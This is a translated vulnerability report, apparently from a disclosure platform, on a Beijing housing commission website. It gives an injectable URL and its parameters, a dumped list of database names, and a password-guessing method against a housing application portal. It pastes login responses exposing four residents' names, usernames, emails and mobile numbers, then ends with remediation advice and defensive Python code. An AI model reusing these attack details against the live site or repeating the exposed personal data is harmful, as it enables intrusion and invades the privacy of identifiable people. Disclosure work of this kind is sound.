
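Beijing Municipal Commission of Housing and Urban-Rural Development vulnerability bundle (two injections on the main site / user information obtainable by brute force)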

 
Code area
http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666

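The two parameters Contract_qyh and Contract_Password are injectable.

The previous report covered the Contract_mf injection point. Because I did not test any further at the time, I only submitted that one; after testing, the other two parameters are injectable as well.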


Code area
available databases [20]:
[*] application
[*] bjfdc
[*] bjfdc_for_auditburea
[*] bjfdc_tax
[*] bjhouse
[*] bjhouse_application
[*] bjrema
[*] datacenter
[*] figure
[*] jianceshi
[*] master
[*] model
[*] msdb
[*] policyhouse
[*] real_estate_analyse
[*] real_estate_analyse_bak
[*] real_estate_analyseImportdata
[*] tempdb
[*] ttib
[*] vk

Proof of vulnerability:

Code area
http://**.**.**.**/enroll/home.jsp

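This is the online application system for self-occupied commercial housing. The CAPTCHA is of little use and a large number of users have weak passwords. Only the top 500 usernames were tested, with the passwords 123456, 111111, 000000, the username itself, and so on.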



Code area
{"flag":1,"message":"登录成功!","data":{"id":"54016","people_name":"李蓉","username":"lirong","email":"287084850@**.**.**.**","mobile":"15510318399"},"redirectUrl":null}

{"flag":1,"message":"登录成功!","data":{"id":"12033","people_name":"张晶","username":"zhangjing","email":"6032561@**.**.**.**","mobile":"13801623808"},"redirectUrl":null}

{"flag":1,"message":"登录成功!","data":{"id":"46993","people_name":"王宁","username":"wangning","email":"casio0018@**.**.**.**","mobile":"13521143322"},"redirectUrl":null}

{"flag":1,"message":"登录成功!","data":{"id":"30169","people_name":"王龙","username":"wanglong","email":"wl_post@**.**.**.**","mobile":"13810447522"},"redirectUrl":null}

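Remediation:

The content_ injection issue may also exist in other places internally; check more widely.

For the second system, fix the CAPTCHA handling, and also remind users to change their passwords.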
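The two fixes suggested for the second system, sketched as an added example (not code from the original report or the affected site): a check that rejects the weak passwords the report names, and a per-source limiter on failed logins that does not depend on the CAPTCHA. `is_weak_password`, `SprayGuard`, `replay`, the thresholds and the sample attempts are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

# Weak values named in the report; a real deployment would use a larger denylist.
WEAK_PASSWORDS = {"123456", "111111", "000000"}

def is_weak_password(username: str, password: str, min_len: int = 8) -> bool:
    """True for a listed weak value, a password equal to the username, or a short one."""
    pw, user = password.strip().lower(), username.strip().lower()
    return pw in WEAK_PASSWORDS or pw == user or len(pw) < min_len

class SprayGuard:
    """Sliding-window limit on failed logins per source address (hypothetical helper)."""
    def __init__(self, max_users: int = 3, max_failures: int = 10, window: float = 300.0):
        self.max_users, self.max_failures, self.window = max_users, max_failures, window
        self.failures = defaultdict(deque)  # source -> deque of (timestamp, username)

    def _recent(self, source: str, now: float) -> deque:
        events = self.failures[source]
        while events and now - events[0][0] > self.window:
            events.popleft()  # drop failures older than the window
        return events

    def allowed(self, source: str, now: float) -> bool:
        # Block on too many failures, or failures spread over too many usernames.
        events = self._recent(source, now)
        distinct_users = {user for _, user in events}
        return len(events) < self.max_failures and len(distinct_users) < self.max_users

    def record_failure(self, source: str, username: str, now: float) -> None:
        self._recent(source, now).append((now, username))

def replay(attempts, guard=None):
    """Run constructed (time, source, username, ok) attempts; return one decision each."""
    guard = guard or SprayGuard()
    decisions = []
    for now, source, username, ok in attempts:
        if not guard.allowed(source, now):
            decisions.append("blocked")  # rejected before credentials are checked
            continue
        if not ok:
            guard.record_failure(source, username, now)
        decisions.append("ok" if ok else "failed")
    return decisions

# Constructed sample: one source walks a username list, another user mistypes once.
SAMPLE = [(0, "198.51.100.7", "user_a", False), (1, "198.51.100.7", "user_b", False),
          (2, "203.0.113.9", "user_z", False), (3, "198.51.100.7", "user_c", False),
          (4, "198.51.100.7", "user_d", False), (5, "203.0.113.9", "user_z", True),
          (400, "198.51.100.7", "user_e", False)]
```

A per-source limit does not stop attempts spread over many addresses, so pair it with a per-account failure limit and alerting on blocked sources.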
